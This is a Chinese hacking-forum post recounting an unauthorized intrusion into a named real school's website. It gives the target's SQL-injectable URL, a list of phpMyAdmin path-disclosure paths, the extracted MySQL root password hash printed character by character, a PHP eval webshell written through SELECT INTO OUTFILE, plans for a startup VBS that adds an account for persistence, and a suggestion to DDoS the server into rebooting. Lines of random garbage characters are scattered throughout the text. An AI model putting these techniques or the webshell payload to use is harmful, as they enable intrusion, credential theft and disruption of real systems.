友情检测湖北省大治市第一中学

admin

第一眼看去，好像全是html静态的，都知道静态的根本不好日，多点击几个专栏
发现这个：http://www.dyyz.net.cn/celebrate/list.php?id=3  -0  -1 判断后确认存在注入！
6 c0 }! P  D) y; ]& [


常规手工不行，尝试突破也不行，利用穿山甲 可以注入：root权限

那么想可以直接写入shell ，getshell有几个条件：
5 }& \, D# ~1 D0 e+ V8 K5 m

1、知道站点物理路径

2、有足够大的权限

3、magic_quotes_gpc()=OFF

1 C/ W0 F2 m% q( s# P- ^- c  h试着爆绝对路径：
! F3 i! b2 C# N8 v0 R, h! ^0 Z, R1./phpMyAdmin/index.php?lang[]=1  
" U( ^* X& u% i% T5 |  ?# m5 f2./phpMyAdmin/phpinfo.php  
3./load_file()  
4./phpmyadmin/themes/darkblue_orange/layout.inc.php  
5./phpmyadmin/libraries/select_lang.lib.php  
6./phpmyadmin/libraries/lect_lang.lib.php  
  s7 V) c) }1 T9 h/ P3 ^7./phpmyadmin/libraries/mcrypt.lib.php   
8./phpmyadmin/libraries/export/xls.php  
* }5 O' {7 t! }2 C+ P4 G
% {1 [$ E8 N0 W均不行...........................

; j  |+ t( U( `* T+ B御剑扫到这个：http://www.dyyz.net.cn//phpinfo.php       获得网站路径：D:/www/phpinfo.php

权限为root，知道网站路径，可是条件3不符合，没法写入shell ，不过服务器存在phpmyadmin

& |4 M3 I: |. G9 v1 m默认不行，尝试万能密码：帐号 'localhost'@'@" 密码空 ，登录失败

敏感东西：http://202.103.49.66/Admincp.php  社工进不去...........
" p5 _  n( k' w' X$ s3 o5 h( z
想想root还可以读，读到root密码进phpmyadmin 也可以拿shell
# E9 |: M  U% l0 o: I" o* U
- p3 R; G! A. ^* A1 V: A% ehttp://www.dyyz.net.cn//phpinfo.php  泄露了D:\phpStudy\PHP5\php.ini

9 Y7 M; \2 L- `. u自己修改好读root密码的路径：D:\phpStudy\MySQL\Data\mysql\user.MYD

成功读到root密码：

17---- r(0072)
18---- o(006f)
! B4 m# }, f2 @# e4 ~2 ^/ U19---- o(006f)
: s. l5 F; F: z+ c: p. j. j; c$ a20---- t(0074)
' q! g# J( i% q2 _* Z' Q+ @7 e21---- *(002a)
22---- 8(0038)
" h( |% ^1 r% E! Z23---- 2(0032)
7 C; y/ \- V* J4 A24---- E(0045)
25---- 1(0031)
26---- C(0043)
! j: k4 O( s. l! b& s- a. h27---- 5(0035)
- m9 C- a" a/ \5 D28---- 8(0038)
29---- 2(0032)
7 k/ ?# u, X. V2 H; F# R0 q5 W: w  d30---- 8(0038)
31---- A(0041)
$ J5 |$ ?/ z* {+ }3 v7 q8 a5 {: \32---- 9(0039)
/ T4 |* O# k) M" s1 e8 x9 b' Q33---- B(0042)
! y6 c0 ?/ ^/ E& {/ _' D* o5 v; I34---- 5(0035)
35---- 4(0034)
36---- 8(0038)
37---- 6(0036)
6 Y0 M4 p& `7 z' D38---- 4(0034)
% n7 y+ @' ~2 r1 Y, h! G3 b39---- 9(0039)
40---- 1(0031)
' [1 y; N! |7 J: s9 j41---- 1(0031)
42---- 5(0035)
; e! E3 {; o) U& p43---- 3(0033)
44---- 5(0035)
45---- 9(0039)
, @$ r1 ^. h4 T$ @46---- 8(0038)
. }  `7 _; d: X% F47---- F(0046)
48---- F(0046)
: K( t' E0 C  }" T# i49---- 4(0034)
* Y: r# g' `: E- V) \: c# j50---- F(0046)
51---- 0(0030)
% M$ X' n9 i7 T. F4 H" P! @+ h  s52---- 3(0033)
53---- 2(0032)
54---- A(0041)
55---- 4(0034)
0 R% j0 C# y( X9 G; V2 i% ^) i56---- A(0041)
; M7 r# U" n0 E+ O/ Q. v57---- B(0042)
58---- *(0044)
9 Y& q2 H6 m+ U59---- *(0035)
60---- *(0041)
1 Y$ P0 s. Q# h8 ^8 Q( D# E; X3 C61---- *0032)

解密后成功登陆phpmyamin
                          
- C2 v8 ?9 s1 T6 {+ z' g! c
                             

. o  i: l" b, P# o找到mysql数据库，执行sql语句：elect '<?php @eval($_POST[pass]);?>'INTO OUTFILE 'd:/wamp/www/daxia.php'
( N+ r0 z' L8 c9 i4 h  f
, X8 O* H# N3 U* W5 ~& P成功执行，拿下shell，菜刀连接：

( n; U. W8 I9 X* C服务器不支持asp,aspx,php提权无果...................

但服务器权限很松，上传个远控小马或是一个添加用户的vbs程序到启动里：

服务器上已经有个隐藏帐号了

' P4 V/ l+ t% U2 H" b

别名     administrators
6 K' u8 O, G# ]注释     管理员对计算机/域有不受限制的完全访问权

# B5 v  U! a# a1 c# \* \3 d6 W

成员

% h$ T# k3 L% k- z* |; o' k

-------------------------------------------------------------------------------
) B6 l8 o  t9 D; ~2 G5 madmin
Administrator
slipper$
4 Z" w9 a5 F! Ysqluser
命令成功完成。

服务器权限很松，上传个vbs添加用户的到启动，不要用bat，会开机的时候显示运行批处理的。
5 d& k7 g! T: l4 O6 I0 L
ddos服务器重启，不然就只能坐等服务器重启了...............................

      

angel